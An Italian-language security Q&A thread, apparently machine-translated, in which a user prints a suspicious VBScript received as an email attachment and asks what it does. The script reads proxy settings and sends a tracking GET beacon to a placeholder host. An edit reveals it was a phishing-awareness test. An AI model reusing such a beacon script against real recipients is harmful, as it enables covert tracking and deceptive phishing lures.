Lo script vbs dannoso apre solo una connessione GET HTTPS

1

Oggi abbiamo ricevuto uno script vbs dannoso nella nostra casella di posta (l'allegato era un file zip contenente lo script).

Sotto puoi trovare la fonte (nota: il dominio è cambiato a causa del non voler diffondere malware, ma i parametri sono sempre gli stessi).

Dim ProxyOn, ProxyServer, ProxyOverride
Dim h, hh, s, u

Set s = CreateObject("wscript.Shell")

u = "https://example.com/?rid%3DVGX0Ipd&pad%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
u = Replace(u, "%3D", "=")

On Error Resume Next

ProxyOn = s.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" & "ProxyEnable")
ProxyServer = s.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" & "ProxyServer")

Set h =  CreateObject("WinHttp.WinHttpRequest.5.1")
Set hh = CreateObject("WinHttp.WinHttpRequest.5.1")

If ProxyOn = 1 Then
    h.SetProxy 2, ProxyServer
End If

hh.SetProxy 1, ProxyServer

On Error Resume Next

h.Open "GET", u, False
h.SetTimeouts 10000, 10000, 10000, 10000
h.Send

If Err.Number <> 0 Then
  On Error Resume Next
  hh.Open "GET", u, False
  hh.SetTimeouts 10000, 10000, 10000, 10000
  hh.Send
End If

WScript.Sleep 2000
WScript.Echo "Installation completed."

A me sembra che non faccia molto, legge le impostazioni del proxy (per evitare il firewall?) e invia un comando GET all'URL (dannoso), ma non fa nulla con la risposta.

Certo che non abbiamo provato a correre.

Che cosa cerca di fare esattamente questo codice?

EDIT: Oggi abbiamo ricevuto conferma che questo fa parte di una campagna sulla sicurezza informatica in azienda! L'analisi nella risposta è davvero corretta.

Cordiali saluti!

    
posta Devenda 21.09.2017 - 13:59
fonte

1 risposta

1

Per quanto posso dire, la tua valutazione sembra accurata. Vedo 2 possibili opzioni:

  1. Questa è una sonda di ricognizione per vedere se qualcuno aprirà gli allegati.
  2. Questo attacco è stato eseguito male e ti è stata inviata una sceneggiatura incompleta.

Attualmente mi sto appoggiando alla seconda spiegazione. Non c'è motivo di echeggiare qualsiasi output in un contagocce, per non parlare di qualcosa di sospetto come "Installazione completata".

    
risposta data 21.09.2017 - 18:10
fonte

Leggi altre domande sui tag